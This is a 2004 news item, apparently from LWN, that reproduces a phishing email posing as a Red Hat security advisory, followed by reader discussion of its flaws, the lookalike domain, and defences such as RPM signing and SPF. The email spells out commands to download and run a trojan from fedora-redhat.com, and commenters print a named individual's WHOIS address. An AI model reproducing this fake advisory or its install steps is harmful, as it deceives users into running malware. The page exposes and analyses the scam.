Weekly Edition
Return to the Security page
| |||||||||||||
Fake Red Hat security update
Original issue date: October 20, 2004 Last revised: October 20, 2004 Source: RedHat A complete revision history is at the end of this file. Dear RedHat user, Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected. The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps: - First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz - Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz - cd fileutils-1.0.6.patch - make - ./inst Again, please apply this patch as soon as possible or you risk your system and others` to be compromised. Thank you for your prompt attention to this serious matter, RedHat Security Team Copyright © 2004 Red Hat, Inc. All rights reserved. (Log in to post comments)
Fake Red Hat security update Posted Oct 25, 2004 13:41 UTC (Mon) by haydentech (guest, #22504) [Link] I swear, if any scammers ever bothered to learn correct English grammar or the art of spellchecking, we'd all be in trouble. Fortunately, they seem obstinately opposed to those ideas.
Fake Red Hat security update Posted Oct 26, 2004 0:35 UTC (Tue) by Ross (subscriber, #4065) [Link] Or learn how to companies write their own name, or bother to even make themessage remotely similar to real Red Hat advisories. If they were smart they would have made the "update" an RPM. I see no reason not to and the fact the patch was a tarfile with a Makefile and a script would be plenty to tell it is fake by itself.
Fake Red Hat security update Posted Oct 28, 2004 8:43 UTC (Thu) by lacostej (guest, #2760) [Link] doesn't red hat sign their packages? If so a fake RPM would have been detected.
Fake Red Hat security update Posted Oct 29, 2004 21:52 UTC (Fri) by giraffedata (subscriber, #1954) [Link] They're not opposed, they just aren't very smart.It's fortunate for society that the Hollywood criminal mastermind is largely a myth. Most criminals are stupid; smart people have other avenues available to achieve their goals (good job, etc.).
Fake Red Hat security update Posted Oct 25, 2004 13:53 UTC (Mon) by alex (subscriber, #1355) [Link] Does the email contain an attachment or is the file hosted on the site? If its hosted on the site surely its an easy task to trace the domain owner and charge them?
Fake Red Hat security update Posted Oct 25, 2004 13:55 UTC (Mon) by busterb (subscriber, #560) [Link] Domain Name.......... fedora-redhat.comCreation Date........ 2004-10-24 Registration Date.... 2004-10-24 Expiry Date.......... 2005-10-24 Organisation Name.... Raymond Jackson Organisation Address. 224 Cedar Avenue Organisation Address. Organisation Address. New York Organisation Address. 95301 Organisation Address. NY Organisation Address. UNITED STATES
Admin Name........... Raymond Jackson
Tech Name............ YahooDomains TechContact
Fake Red Hat security update Posted Oct 25, 2004 14:38 UTC (Mon) by pascal.martin (guest, #2995) [Link] The ZIP code is for Atwater, CA not New York City, NY (NYC is 01xxx.. is anyone checking addresses at the registrars?). There is a 224 cedar Avenue there, through..
A Raymond Jackson lives there, according to the Yahoo phone book.
I suggest to be polite and not overflow the guy with phone calls: there is no proof he is not a victim as well..
It seems the site was taken down.
The script is SOOOOOO silly Posted Oct 25, 2004 14:35 UTC (Mon) by jeld (guest, #22397) [Link] These guys have no imagination. So, did anyone notify addlebrain.com that one of their boxen was rooted?
The script is SOOOOOO silly Posted Oct 25, 2004 14:44 UTC (Mon) by pascal.martin (guest, #2995) [Link] http://addlebrain.com was running Microsoft-IIS on Windows Server 2003 when last queried (Netcraft).
Not a root kit & no comment..
The script is SOOOOOO silly Posted Oct 25, 2004 15:06 UTC (Mon) by jeld (guest, #22397) [Link] Obviously it is not running IIS anymore, it runs some sort of apache. Here is the transcript:
HEAD / HTTP/1.0
HTTP/1.1 200 OK
addlebrain.com Posted Oct 26, 2004 1:57 UTC (Tue) by jtc (subscriber, #6246) [Link] I missed where addlebrain.com fits into this, but I get the following results from HEAD:
$ HEAD addlebrain.com
addlebrain.com Posted Oct 26, 2004 2:54 UTC (Tue) by jeld (guest, #22397) [Link] Well... looks like you are right, except, that addlebrain.com (running IIS 6) is being redirected to www.addlebrain.com running apache. Since this is a valid site, and the email address where the script is sending cracked host info is root@addlebrain.com I figured that someone rooted one of addlebrain's boxes. Otherwise I don't know. addlebrain.com seems to belong to a company called ABM Wireless which sells cell phone accessories. MX record for addlebrain.com points to a server on everyone.net domain which is a mail hosting company. I cannot find much info about addlebrain.com IP address, but www.addlebrain.com address belongs to a dedicated web server/colocation company ThePlanet.com.
Fake Red Hat security update Posted Oct 25, 2004 16:08 UTC (Mon) by JoeBuck (subscriber, #2330) [Link] This shows that it was a very wise decision to add digital signatures to RPMs, and to have the rpm program verify those signatures before installation. If it were not for that, these guys could have packaged their trojan as an RPM, and with suitable trickery they might even have misled people into thinking they were getting the RPM off of a Red Hat site. But an RPM that is not signed with a key that is already loaded into the rpm database will not install.
Fake Red Hat security update Posted Oct 25, 2004 16:51 UTC (Mon) by utidjian (guest, #444) [Link] "But an RPM that is not signed with a key that is already loaded into the rpm database will not install."That is not quite true... at least not on any Red Hat or Fedora Core systems I have. It is true that 'yum update', 'apt-get update' and up2date will not, by default, install any unsigned or incorrectly signed packages. However, a simple 'rpm -ivh someunsignedpackage.rpm' will just go right ahead and install it. -DU-...etc...
Fake Red Hat security update Posted Oct 25, 2004 16:42 UTC (Mon) by csm1975 (guest, #15864) [Link] SPF would prevent this sort of email from being accepted by the victim. Red Hat *DOES* have proper SPF records in DNS.
;; ANSWER SECTION:
So... if persons who received this email were to implement SPF on their end they would not get another one of these that "purported" to be from redhat.com.
http://spf.pobox.com for more information.
Fake Red Hat security update Posted Oct 25, 2004 18:25 UTC (Mon) by admcd (guest, #5415) [Link] Would SPF have prevented this?
What if the e-mail came from the fedora-redhat.com domain given in the e-mail? The owner of that fake domain could even have published SPF records for it, if they really wanted to.
Fake Red Hat security update Posted Oct 25, 2004 19:45 UTC (Mon) by csm1975 (guest, #15864) [Link] My SPF config would have...
If it had come from the fedora-whatever site it would not have but that wouldn't have been much of a phishing attempt would it?
Fake Red Hat security update Posted Oct 26, 2004 7:35 UTC (Tue) by admcd (guest, #5415) [Link] In which case you wouldn't have clicked on the www.fedora-redhat.com link. So SPF would have made no difference either way.
Fake Red Hat security update Posted Nov 4, 2004 15:41 UTC (Thu) by job (guest, #670) [Link] No, SPF would not have prevented that. The sender would have said "MAILFROM: myownsite.com", and "From: security@redhat.com" to you and you would be none the wiser. How often do you read your mail transactions to catch that suspicious looking line? Most people never have. Yet everyone and their dog wants to have opinions about how mail transport done. Learning how it works is much wiser, but few do.
Fake Red Hat security update Posted Oct 25, 2004 18:52 UTC (Mon) by ccchips (guest, #3222) [Link] I just re-read the "announcement" here.
wget?
I have a thought:
This person may be out to prove that Linux is no longer as secure as we'd like now that the average Joe can get 'hold of it, and now that it's becoming popular.
Myself, I would have cought this on a number of points:
However, I am almost certain that some Windows users would have fallen for this, and I can't help but wonder if this clown was after newly-migrated Windows users.
Fake Red Hat security update Posted Oct 26, 2004 9:06 UTC (Tue) by hppnq (guest, #14462) [Link] I got one today that claimed to be Microsoft's. Same story, but it did look a lot more professional (working links to microsoft.com, graphics and all). I didn't have a chance to disassemble the attached update, it was removed by my ISP.Sigh.
Fake Red Hat security update Posted Oct 28, 2004 3:02 UTC (Thu) by marduk (subscriber, #3831) [Link] I dont' think they're out to "prove" anything regarding Linux. These are the same kinds of people who who send out the fake PayPal/Citibank registration emails. They're not trying to make a statement, just trying to screw over some poor soul. The only real difference is that these guys know how to use the command line...
Fake Red Hat security update Posted Oct 28, 2004 16:26 UTC (Thu) by bod (subscriber, #17096) [Link] > wget?
Nothing wrong with wget. Debian security advisories routinely include
Note however that DSAs are both signed and include MD5 sums for the updated
Fake Red Hat security update Posted Oct 28, 2004 19:57 UTC (Thu) by Alan_Hicks (subscriber, #20469) [Link] - Security patch announcements from reputable companies don't come by e-mail You just called Slackware Inc. an irreputable company by inference. Granted, Slackware Inc. only sends security advisories out by the mailing list, so if you meant that they don't randomnly send out e-mails to users, you're correct. Of course, those e-mails (as well as the packages) are digitally signed, meaning you can verify if it really did come from Slackware Inc. or not.
Fake Red Hat security update Posted Oct 28, 2004 22:19 UTC (Thu) by BackSeat (subscriber, #1886) [Link] > Security patch announcements from reputable companies don't come by e-mail
Most mainstream distributions have a security email list (SuSE, Gentoo, Debian, etc).
security patch announcements by email Posted Oct 29, 2004 21:49 UTC (Fri) by giraffedata (subscriber, #1954) [Link] A lot of people would says it's irresponsible of a company not to email its customers and tell them they need a security patch. I'm not a customer of any companies that distribute security patches, but I do occasionally get an email from my ISP urging me to get recent Windows updates.
|
|||||||||||||